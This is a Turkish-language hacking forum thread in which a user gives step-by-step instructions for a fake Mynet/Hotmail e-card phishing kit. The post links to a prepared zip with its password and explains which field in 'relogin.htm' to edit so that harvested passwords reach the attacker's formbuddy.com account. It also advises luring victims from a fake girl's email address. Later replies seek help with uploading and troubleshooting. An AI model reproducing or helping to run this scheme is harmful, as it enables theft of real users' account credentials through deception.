folder Tahribat.com Forumları
linefolder Skype - Mirc - Irc - Icq - Mail Güvenliği
linefolder Hotmail \ E-Kart Fake [ Herkez Yapabilir.. ]

Hotmail \ E-Kart Fake [ Herkez Yapabilir.. ]

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    NetPoLice
    NetPoLice's avatar
    Erkek
    Fake'lerde en çok tutan Mynet Ekart Numarasının en Orjinal Halini en kolay Sekilde anlatmaya calısacagım ama bu kez kodlarla felan ugrasmanıza gerek kalmıcak.

ilk basta formbuddy.com üyeligi olmayan arkadaslar siteye üye olamıyorsanız su dökümandan yardım alabilirsiniz.

http://www.turkhackarea.net/materyal/formbuddy.htm

Formbuddy.Com'a üye olduktan sonra

http://rapidshare.de/files/5152627/NetPolice.zip.html bu dosyayı indiriyorsunuz.
    Zip sifresi : turkhackarea.net

yapmanız gereken tek sey NetPolice.zip içindeki 3 tane htm dosyasını çıkarıp " relogin.htm " de kaynak kodlar arasında " TURKHACKAREA " yazan yere kendi formbuddy.com üyelik adını yazmanız. baska hiç bir yere dokunmuyorsunuz sonra kaydedip bırakıyorsunuz.

ve bu 3 dosyayı internet üzerinde aynı dizinde bir yere upload ediyorsunuz. fake hazır durumda yiyenlere afiyet olsun.

Mantık : Kurban için olayların gelişimi yaklaşık 1 dk. sürüyor gelen ekarta bakmak için linke tıklıyor. ekart yüklenirken sayfa süre asımına ugruyor. kartı görebilmek için login oluyor ve kartı görüyor bu arada sifre sizin istediginiz formbuddy adresine geliyor.

Fake i bir kız mailinden atmanız ben dilara ismini kullandım sizde dilara_15565 @ hotmail.com gibi mailler alarak kurbanınıza " gonder.htm " yi göndereceksiniz. buradada yapmanız gereken tek sey içinde dilara ismi gecen bir mail almanız..

Osmanlı Torunu
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nedim
    nedim's avatar
    Erkek
    herkez yapamaz arkadaşlar

KARANLIK ŞEHİR
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    sorcerer
    sorcerer's avatar
    Üstün Hizmet Madalyası Üstün Hizmet Madalyası
    Erkek

bunu yaklasık 2 sene önce olması lazım Tahrip.Com forumlarında Hack Tarafından yazılmıştı orda gördüm : )

Coco cola gibiyim hayatın tadıyım, rocco gibiyim çok şekerim, albeniyim bahanem çok, çikolatalı gofretim beni sevmeyen yok!...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    -SWAT-
    -SWAT-'s avatar
    Erkek
    "relogin" html içindeki kodlar nerde baba?

Bu Alemde İKİ büyük vardır.Biri ANKARAGÜCÜ,diğeride 70LİK RAKI!
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    NetPoLice
    NetPoLice's avatar
    Erkek

Nedim niye herkez yapamasın yani bundan dahada kolay bi anlatımı olmaz ki herseyi ayarlı yükleyip göndericek herkez.

Sorci. bu e-kart fake'nin yazarı zaten Hack yani AhmetDENIZ  ben sadece kolaylık olsun html den felan hiç anlamayan arkadaslarda yapabilsin  die dosyaları birleştirdim köprüleri ayarladım buraya koydum.

SWAT "relogin.htm" içindeki kodlarda önce "relogin.htm" yi kendi bilgisayarında ac. sayfa üzerinde sag tus , kaynagi goruntule, Oradan bulup silcen yerine kendi acc. ni yazcan.

Osmanlı Torunu
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    nascar_thunder
    nascar_thunder's avatar
    Erkek
    kardeşim herşey için tşk kür gerçekten çok açık yazmışın fakat takıldığım tek yer var:
    "bu 3 dosyayı internet üzerinde aynı dizinde bir yere upload ediyorsunuz"nereye upload edeceğimi anlıyamadım ve nasıl yapacağımı yardımın için şimdiden tşk
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    NetPoLice
    NetPoLice's avatar
    Erkek
    ya işte hostuna yükle, free yerlere yüklesende olur aynı dizinde olsunda nerede olursa olsun.

Osmanlı Torunu
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    aacemmi
    aacemmi's avatar
    Erkek

Bad Referrer - Access Denied

The form attempting to use FormMail resides at http://www.geocities.com/aacemmi/mynet?200515, which is not allowed to access this cgi script.

If you are attempting to configure FormMail to run with this form, you need to add the following to @referers, explained in detail in the README file.

Add 'www.geocities.com' to your @referers array.

FormMail V1.6 © 1995 - 1997 Matt Wright
    A Free Product of Matt's Script Archive, Inc.

ben zamanında yaptım kendimce şu yukardaki geliyo neden acaba

Yol uzun olabilir. Önemli olan yolun neresinde olduğumuzdur
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    NetPoLice
    NetPoLice's avatar
    Erkek
    benim verdigim kodlarda formbuddy sitesinin yönlendirilmesini kullandım. geocities veya formmail deil . ama senin formmailinden kaynaklanıor o.

Osmanlı Torunu
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    focuturk
    focuturk's avatar
    Erkek
    hangi dosyayi yollayacağız acaba ? ve bunu yiyebilecek sazanlar varmıdır ki
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Csop
    Csop's avatar
    Erkek
    güzel bir şey fakat bir deniyelim bakalım olacakmı :p :D saol dost

Csop [mardin Team]